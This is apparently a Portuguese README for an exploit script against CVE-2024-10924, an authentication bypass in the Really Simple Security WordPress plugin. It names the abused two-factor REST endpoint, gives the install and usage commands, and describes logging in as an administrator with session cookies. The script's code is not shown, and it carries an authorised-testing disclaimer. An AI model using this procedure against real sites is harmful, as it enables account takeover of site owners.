
Really Simple Security (Free, Pro e Pro Multisite) 9.0.0 - 9.1.1.1 - Bypass de Autenticação
Really Simple Security (Free, Pro, e Pro Multisite) 9.0.0 - 9.1.1.1 - Bypass de Autenticação
Este script explora uma vulnerabilidade no plugin Really Simple Security (versões 9.0.0 - 9.1.1.1) para WordPress. A falha permite bypass de autenticação devido ao tratamento incorreto de erros na função check_login_and_get_user da API de Autenticação de Dois Fatores.
Usando este exploit, um atacante pode fazer login como qualquer usuário (ex.: administrador) se o 2FA estiver habilitado. Uma vez autenticado, o script inicia automaticamente uma sessão de navegador com os cookies de sessão obtidos.
Antes de executar o script, instale as dependências necessárias:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/, concedendo acesso de administrador sem necessidade de senha.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
Este script é destinado apenas a fins educacionais e avaliações de segurança autorizadas. O uso indevido deste script pode resultar em consequências legais. Sempre obtenha a devida autorização antes de testar em qualquer sistema.